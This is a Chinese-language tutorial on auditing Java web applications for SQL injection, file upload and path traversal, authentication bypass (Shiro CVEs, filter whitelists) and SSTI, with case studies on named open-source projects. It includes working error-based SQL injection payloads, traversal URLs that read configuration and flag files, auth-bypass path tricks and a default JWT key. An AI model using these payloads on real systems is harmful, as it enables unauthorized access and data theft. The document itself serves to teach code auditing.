Java安全：基础漏洞审计实战教学文档<\/h1>

1. 项目结构分析<\/h2>

1.1 关键目录与文件<\/h3>

pom.xml<\/strong>：Maven项目配置文件，包含组件版本信息<\/li>

src\/main\/resources\/conf\/<\/strong>：主配置目录（可能不存在）

*.properties<\/code>：组件配置信息（MyBatis, Shiro, Log4j, Spring Boot等）<\/li>
application.properties<\/code>：Spring Boot主配置文件（数据库配置、启动路径、端口信息、日志配置）<\/li> <\/ul> <\/li>
src\/main\/resources\/templates<\/strong>：模板文件目录<\/li>
src\/main\/resources\/mappers<\/strong>：MyBatis的XML文件，定义SQL语句<\/li>
src\/main\/java\/包名\/<\/strong> controller<\/code>：处理HTTP请求<\/li> services<\/code>：功能逻辑代码实现<\/li> model<\/code>：定义处理数据类型<\/li> common<\/code>：公共资源 formValid\/<\/code>：表单验证相关<\/li> Interceptor\/<\/code>：请求拦截器<\/li> <\/ul> <\/li> <\/ul> <\/li> src\/main\/webapp\/WEB-INF\/<\/strong>：Web配置 web.xml<\/code>：Web应用主配置文件（定义Servlet、过滤器、监听器）<\/li> <\/ul> <\/li> <\/ul> 2. SQL注入漏洞审计<\/h2> 2.1 JDBC注入<\/h3> 危险代码特征<\/strong>：<\/p> 字符串拼接：+<\/code>号拼接<\/li> StringBuilder.append()<\/code><\/li> String.concat()<\/code><\/li> 搜索关键词：append(<\/code>, concat(<\/code><\/li> <\/ul> 2.2 MyBatis注入<\/h3> 安全与不安全写法<\/strong>：<\/p> 安全写法：使用#{}<\/code>（预编译参数）<\/li> 不安全写法：使用${}<\/code>（直接拼接）<\/li> 搜索关键词：${<\/code><\/li> <\/ul> 易产生注入的特殊场景<\/strong>：<\/p> 模糊查询LIKE<\/code>语句<\/li> ORDER BY<\/code>排序<\/li> IN<\/code>子句<\/li> HAVING<\/code>子句<\/li> <\/ol> SQLMap特殊参数<\/strong>：<\/p> sqlmap --level 5<\/span> --risk 3<\/span> <\/span><\/span><\/code><\/pre>报错注入Payload示例<\/strong>：<\/p> 1<\/span> and<\/span> (SELECT<\/span> updatexml(1<\/span>, concat(0<\/span>x7e,(SELECT<\/span> database<\/span>()),0<\/span>x7e),1<\/span>)) <\/span><\/span>1<\/span> and<\/span> updatexml(1<\/span>, concat(0<\/span>x7e,(database<\/span>()),0<\/span>x7e),1<\/span>) <\/span><\/span>?<\/span>orderColumn=<\/span>1<\/span> AND<\/span> EXTRACTVALUE(1040<\/span>, CONCAT(0<\/span>x5c, 0<\/span>x7178766b71,(SELECT<\/span> (ELT(1040<\/span>=<\/span>1040<\/span>,1<\/span>))),0<\/span>x717a767871)) <\/span><\/span><\/code><\/pre>2.3 案例研究<\/h3> 案例1：jfinal_cms-4.5.0<\/h4> 发现点：pom.xml<\/code>显示未使用数据库框架，采用MySQL<\/li> 搜索append(<\/code>发现多处SQL注入<\/li> 注入点：\/admin\/concat\/<\/code>路由对应的list<\/code>方法<\/li> 前台查询功能存在注入<\/li> <\/ul> 案例2：oa_system (MyBatis)<\/h4> 发现点：pom.xml<\/code>中的MyBatis框架<\/li> 不安全写法：${baseKey}<\/code>和${pinyin}<\/code><\/li> 触发路由： \/informListPaging<\/code>（参数basekey<\/code>）<\/li> \/outaddresspaging<\/code>（参数alph<\/code>）<\/li> <\/ul> <\/li> <\/ul> 案例3：RuoYi-v4.6.0 (MyBatis)<\/h4> 发现点：pom.xml<\/code>中的MyBatis依赖<\/li> 不安全写法：${ancestors}<\/code><\/li> 功能点：部门编辑<\/li> 触发路由：\/system\/dept\/edit<\/code>（参数ancestors<\/code>）<\/li> <\/ul> 3. 文件类漏洞审计<\/h2> 3.1 关键搜索点<\/h3> 文件操作相关代码<\/strong>：<\/p> new<\/span> FileInputStream(<\/span> <\/span><\/span>new<\/span> FileOutputStream(<\/span> <\/span><\/span>new<\/span> File(<\/span> <\/span><\/span>FileUtils.<\/span> <\/span><\/span>IOUtils.<\/span> <\/span><\/span><\/code><\/pre>文件上传相关代码<\/strong>：<\/p> MultipartFile <\/span><\/span>file.<\/span>getOriginalFilename<\/span>(<\/span> <\/span><\/span>file.<\/span>transferTo<\/span>(<\/span> <\/span><\/span><\/code><\/pre>文件下载相关代码<\/strong>：<\/p> response.<\/span>setContentType<\/span>(<\/span>"application\/octet-stream"<\/span>)<\/span> <\/span><\/span>getFile <\/span><\/span>download <\/span><\/span><\/code><\/pre>目录操作相关代码<\/strong>：<\/p> .<\/span>mkdirs<\/span>(<\/span> <\/span><\/span>.<\/span>createNewFile<\/span>(<\/span> <\/span><\/span><\/code><\/pre>优先搜索<\/strong>：new FileInputStream(<\/code><\/p> 3.2 案例研究<\/h3> 案例1：Inxedu - 文件上传<\/h4> 上传JSPX绕过检测<\/li> 路由地址：POST \/inxedu_war\/image\/gok4?fileType=jspx,jpg,gif,png,jpeg&param=temp<\/code><\/li> <\/ul> 案例2：Tmall - 配合过滤器绕过<\/h4> 绕过验证：URL包含\/admin\/login<\/code>即通过，配合..\/<\/code>绕过<\/li> 后台存在未过滤的文件上传功能<\/li> <\/ul> 案例3：Ruoyi - 文件下载<\/h4> 搜索点：FileInputStream(<\/code><\/li> 触发路由：\/common\/download\/resource?resource=\/profile\/..\/RuoYi-v4.5.0\/ruoyi-admin\/src\/main\/resources\/application.yml<\/code><\/li> 绕过要求：必须包含profile<\/code>再..\/<\/code>绕过<\/li> <\/ul> 案例4：Oasys - 文件读取<\/h4> 搜索点：new FileInputStream(<\/code><\/li> 路径穿越限制：检测到2个..\/..\/<\/code>会报错，但一个..\/<\/code>可执行<\/li> 绕过技巧：嵌套..\/<\/code>实现路径穿越 ?path=\/image\/..\/image\/..\/image\/..\/image\/..\/image\/..\/image\/..\/image\/..\/image\/..\/image\/flag.txt <\/code><\/pre> <\/li> <\/ul> 4. 未授权访问漏洞审计<\/h2> 4.1 鉴权方法<\/h3> Interceptor拦截器<\/strong>：src\/main\/java\/包名\/interceptor<\/code><\/li> Filter过滤器<\/strong>：src\/main\/java\/包名\/filter<\/code><\/li> Shiro框架<\/strong>：src\/main\/resource\/**<\/code><\/li> <\/ol> 4.2 Shiro相关漏洞<\/h3> Shiro版本自身漏洞绕过<\/h4> CVE-2020-1957<\/strong>：<\/p> 客户端请求URL: \/xxx\/..;\/admin\/<\/code><\/li> Shiro校验URL为\/xxxx\/..<\/code>，校验通过<\/li> SpringBoot最终请求\/admin\/<\/code><\/li> <\/ul> <\/li> CVE-2020-11989<\/strong>：<\/p> 客户端请求URL: \/;\/test\/admin\/page<\/code><\/li> Shiro校验URL为\/<\/code>，校验通过<\/li> SpringBoot最终请求\/admin\/page<\/code><\/li> <\/ul> <\/li> CVE-2020-13933<\/strong>：<\/p> 客户端请求URL: \/admin\/;page<\/code><\/li> Shiro校验URL为\/admin\/<\/code>，校验通过<\/li> SpringBoot最终请求\/admin\/;page<\/code><\/li> <\/ul> <\/li> <\/ol> Shiro配置不当<\/h4> 示例配置：<\/p> tumo.shiro.anon_url=\/comment\/** <\/code><\/pre> 可能导致：DELETE \/comment\/1<\/code>任意文件删除<\/p> JWT默认密钥<\/h4> 常见默认密钥：<\/p> SecretKey012345678901234567890123456789012345678901234567890123456789 <\/code><\/pre> 4.3 绕过手法<\/h3> 分号;<\/code>处理<\/strong>：<\/p> Tomcat会自动去除;<\/code>后面的字符<\/li> 示例： \/;a.png\/admin == \/admin \/admin\/;.png == \/admin \/admin\/;.js == \/admin \/admin\/;.css == \/admin <\/code><\/pre> <\/li> <\/ul> <\/li> 斜杠\/<\/code>处理<\/strong>：<\/p> Tomcat会自动处理多余的\/<\/code><\/li> 示例： \/\/\/\/\/admin == \/admin <\/code><\/pre> <\/li> <\/ul> <\/li> 路径穿越..\/<\/code><\/strong>：<\/p> 当..\/<\/code>被禁用时，可使用\/..;abc\/<\/code>实现跨目录<\/li> <\/ul> <\/li> 白名单绕过<\/strong>：<\/p> 如果白名单匹配png\/css\/js<\/code>结尾的文件放行： \/admin\/;.png == \/admin \/admin\/;.js == \/admin \/a.js\/..\/account\/getAccount <\/code><\/pre> <\/li> <\/ul> <\/li> <\/ol> 4.4 案例研究<\/h3> 案例1：NewbeeMall<\/h4> 使用Interceptor拦截器进行身份认证<\/li> 绕过方法：\/admin\/;.js<\/code><\/li> <\/ul> 案例2：华夏ERP<\/h4> 使用过滤器进行鉴权<\/li> 绕过条件：URL包含login.html<\/code>或register.html<\/code>即通过<\/li> <\/ul> 案例3：Tumo<\/h4> Shiro配置不当： tumo.shiro.anon_url=\/login,\/logout,\/register,\/,\/about,\/p\/**,\/links,\/comment\/**,\/link\/list,\/article\/list,\/css\/**,\/js\/**,\/img\/** <\/code><\/pre> <\/li> 可访问\/comment<\/code>及后面任意路径，如\/comment\/1<\/code>，可能导致DELETE方法删除<\/li> <\/ul> 5. SSTI模板注入<\/h2> 利用条件<\/strong>：<\/p> 可控变量（传参、SQL注入结果等）<\/li> <\/ul> 功能点<\/strong>：<\/p> 模板管理<\/li> <\/ul> PoC参考<\/strong>：<\/p> https:\/\/github.com\/vladko312\/SSTImap<\/li> <\/ul> 6. JavaEE审计CheckList<\/h2> 参考资源<\/strong>：<\/p> https:\/\/mp.weixin.qq.com\/s\/Y90mGgCqzjj0T1NX9E5wDw<\/li> https:\/\/mp.weixin.qq.com\/s\/COXCjMItvrcOCNcqEfbmDg<\/li> <\/ol>